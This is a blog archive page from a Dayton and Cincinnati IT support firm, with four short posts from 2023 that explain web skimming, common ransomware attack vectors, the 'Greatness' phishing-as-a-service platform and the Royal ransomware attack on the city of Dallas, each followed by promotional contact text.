Events

06
Jun
2023

What is Web Skimming?

What is Web Skimming

Back to Basics

Web skimming gets its name from the physical card skimmers criminals use in some physical retail stores to steal credit card information. Web skimming has a similar goal of stealing personally identifiable information (PII) and credit card information to be used by criminals. Also known as digital skimming, criminals use compromised retail websites to insert malicious JavaScript code to record information during the online checkout process. The skimming software can live on retail pages for months without the business being aware because it does not shut down or lock up information like malware. Additionally, criminals are getting better at hiding the skimmers and making them look like third-party services to prevent web security updates from detecting them.

Recently WordPress and Shopify were exploited by sophisticated web skimmers that looked like Google Tag Manager and Facebook Pixel services to conceal the malicious code and keep the skimmers running longer. Criminals track vulnerabilities in legitimate e-commerce websites and look for opportunities to insert malicious code into the checkout pages. Typically these vulnerabilities come in the form of security updates and plugins. Once a vulnerability is known, criminals can search the web for businesses that are not keeping up with security updates and use the published vulnerabilities to compromise the site.

These high-level skimmers used JavaScript to load the full attack code, so the complete code was not hosted on the victim’s website. Additionally, the code would only steal an individual user’s information once to prevent further detectability. The criminals of this latest attack targeted e-commerce hosting sites, so they would distribute the malicious code to their customers, further spreading the skimmers for the hackers. Consumers should be aware of the advancement in sophisticated skimmers and be aware of the credit cards they use on e-commerce sites.

Quanexus IT Support Services for Dayton and Cincinnati

Request your free network assessment today. There is no hassle, or obligation.

If you would like more information, contact us here or call 937.885.7272.

Follow us on FacebookTwitter and LinkedIn and stay up to date on by subscribing to our email list.

Posted by Charles Wright in Back to Basics, Cybersecurity, Recent Posts
23
May
2023

Most Common Attack Vectors

Most Common Attack VectorsRansomware attacks have become a more significant concern for small and medium-sized businesses (SMBs) in the US. With the addition of ransomware as a service (RaaS) and its harmful possibilities, businesses should be aware of the most common attack vectors and how they are compromised. Data shows ransomware attacks leveled off in 2022 but are on the rise again in 2023 as attack vectors continue to evolve and criminals adopt more automated tactics.

The vulnerability that is exploited most often, resulting in a ransomware attack, is public-facing applications that can be compromised. Criminals discover a critical flaw in an enterprise-level piece of software and are able to access a business network and steal data. Businesses can defend against this attack vector by regularly patching and updating systems on a recommended schedule and when manufacturers publish critical updates. Many of the large ransomware attacks that make the news and affect thousands of users can be traced back to a known critical patch that was not followed by the business.

The use of compromised credentials is the next most often exploited vulnerability. Phishing can compromise credentials, but the more common issues are leaked or bought breached data and password re-use. Criminals can buy passwords from other data breaches, and if your employees re-use passwords on numerous services, they may have access to business credentials even if your data was not stolen. Multi-factor authentication (MFA) and passwordless logins that use systems like passkey can both help to fight against compromised credentials. MFA is the easiest short-term solution and can be enabled on most enterprise-level systems.

Malicious email attacks still retain third place in the most common attack vectors; even with employee training and sophisticated email filtering, malicious emails are still getting through and still being clicked on. Employees should be aware of the common attack vectors and understand phishing attacks are becoming more sophisticated and targeted to individual users.

Quanexus IT Support Services for Dayton and Cincinnati

Request your free network assessment today. There is no hassle, or obligation.

If you would like more information, contact us here or call 937.885.7272.

Follow us on FacebookTwitter and LinkedIn and stay up to date on by subscribing to our email list.

Posted by Charles Wright in Back to Basics, Cybersecurity, Small Business
16
May
2023

New Paas Targets Microsoft 365

New Paas Targets Microsoft 365 UsersA new phishing as a service (PaaS) platform is being used to create convincing Microsoft 365 login prompts and takes advantage of multi-factor authentication (MFA) at a low cost. The new platform named Greatness can create convincing Microsoft 365 cloud login screens that include the company logo, background image, and will even pre-fill the victim’s email address into the username field to look more realistic. The PaaS platform is mainly used to target manufacturing, healthcare, and technology companies but has also been reportedly used on education, construction, and financial businesses. The hacking service has primarily targeted business users in the US, UK, Australia, South Africa, and Canada since mid-2022.

The platform Greatness also goes a step further and can capture and use multi-factor authentication codes for Microsoft. When the user enters their credentials into the phishing site, the service communicates with Microsoft to prompt for MFA authentication. The hacking service then passes the authentication back to Microsoft in real time and captures the authentication token to be used again later by the attacker. This new hacking service is set up so that even unskilled attackers can use the most advanced features like compromising MFA, and records the stolen credentials and authentication token in an easy-to-use format.

Phishing as a service platforms have become more sophisticated over the past year, and many of them include professional toolkits that track compromised credentials and offer customer support. The cost and technical ability required have also been reduced. Not long ago, attackers needed a moderate level of programming knowledge to use the PaaS tools, but this is no longer the case. The tools have been made very user-friendly, and at a cost between $40 – $1000, anyone can launch a phishing campaign. This ease of access presents logistical problems for competing businesses or former employees.

Quanexus IT Support Services for Dayton and Cincinnati

Request your free network assessment today. There is no hassle, or obligation.

If you would like more information, contact us here or call 937.885.7272.

Follow us on FacebookTwitter and LinkedIn and stay up to date on by subscribing to our email list.

Posted by Charles Wright in Cybersecurity, Information Security, Small Business
09
May
2023

City of Dallas Ransomware

City of Dallas Ransomware AttackA ransomware attack on the city of Dallas, Texas, has negatively impacted city utilities and slowed emergency service response time. The city suffered a ransomware attack attributed to the hacker group Royal, Monday, May 1st. Network printers on the city’s network began printing ransom notes Monday morning with instructions on how to contact the hacker group.

The attack forced the city government to shut down IT systems to contain and mitigate the ransomware. Police and fire employees received an urgent message to unplug the computers in their emergency vehicles. Part of the systems taken offline were 911 dispatcher computers, which have forced emergency call centers to revert to pencil and paper for recording call details and communication with emergency services through radio. The Dallas Fire Fighters Association president said the first responders have received little guidance from city leadership. In the ninth-largest city in the United States, 911 calls are being missed because radio traffic is so busy. Emergency responders are not getting the follow-up information they are used to receiving from dispatch via computers.

Additionally, courts were closed Monday, utility bills could not be processed, and a handful of other non-emergency services were offline for a week. The city said they would add devices and services back to the network individually when it was safe to do so.

US cybersecurity agency CISA sounded the alarm on Royal as a ransomware group gaining power in early March. The CISA said they specifically target critical infrastructure sectors, including communications, education, and healthcare. First observed in 2022, the ransomware gang typically gains access through phishing links and exfiltrates large amounts of data before notifying the victim.

Ransomware groups are shifting their tactics to data extorsion. Hackers had to find a new way to make money when governments and law enforcement started breaking encryptions. Recent threats, including the printout from Royal, include threats to release or sell personal customer data.

Quanexus IT Support Services for Dayton and Cincinnati

Request your free network assessment today. There is no hassle, or obligation.

If you would like more information, contact us here or call 937.885.7272.

Follow us on FacebookTwitter and LinkedIn and stay up to date on by subscribing to our email list.

Posted by Charles Wright in Cybersecurity, Recent Posts, Small Business